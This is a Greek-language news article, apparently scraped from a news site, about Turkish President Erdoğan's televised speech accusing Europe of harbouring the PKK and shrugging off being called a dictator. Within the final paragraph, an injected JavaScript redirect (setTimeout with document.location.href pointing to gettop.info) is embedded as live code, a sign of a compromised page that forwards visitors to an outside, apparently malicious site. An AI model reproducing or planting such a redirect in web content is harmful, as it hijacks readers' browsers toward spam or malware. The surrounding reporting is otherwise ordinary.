Ερντογάν: Ό,τι λένε, από το ένα αυτί μπαίνει, από το άλλο βγαίνει

0
10

«Δεν μ’ ενδιαφέρει αν οι Ευρωπαίοι θα με αποκαλέσουν δικτάτορα επειδή καταστέλλω την κουρδική αυτονομιστική οργάνωση και τους συμπαθούντες της» τόνισε ο πρόεδρος της Τουρκίας Ρετζέπ Ταγίπ Ερντογάν, εξαπολύοντας νέα πυρά κατά της ΕΕ, στη σκιά νέας έκθεσης που επικρίνει την Άγκυρα για προβλήματα στην ελευθερία του Τύπου.

Παράλληλα, κατηγορεί την Ευρώπη ότι με τη στήριξη που προσφέρει στο Εργατικό Κόμμα του Κουρδιστάν (PKK) υποθάλπει την τρομοκρατία.

«Η Ευρώπη, στο σύνολό της, υποθάλπει την τρομοκρατία. Μολονότι χαρακτήρισαν το PKK τρομοκρατική οργάνωση, είναι σαφές… Βλέπουμε πώς το PKK δρα τόσο ελεύθερα και άνετα στην Ευρώπη» είπε ο Τούρκος πρόεδρος σε ομιλία του που μεταδόθηκε από την τηλεόραση.

Όλα τα όπλα που έχουν κατασχεθεί από μέλη του PKK προέρχονταν από τη Δύση, υποστήριξε δε. «Δεν μ’ ενδιαφέρει αν με πουν δικτάτορα ή οτιδήποτε άλλο. Από το ένα αυτί θα μπει, από το άλλο θα βγει. Αυτό που έχει σημασία είναι πώς με αποκαλεί ο λαός μου» ανέφερε χαρακτηριστικά. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here